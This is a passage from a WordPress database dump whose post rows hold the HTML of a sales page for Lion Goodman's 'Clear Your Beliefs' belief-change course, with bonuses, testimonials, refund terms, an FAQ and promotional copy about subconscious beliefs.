consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-12 13:19:32', '2015-05-12 18:19:32', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2171, 2, '2015-05-12 13:18:01', '2015-05-12 18:18:01', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works 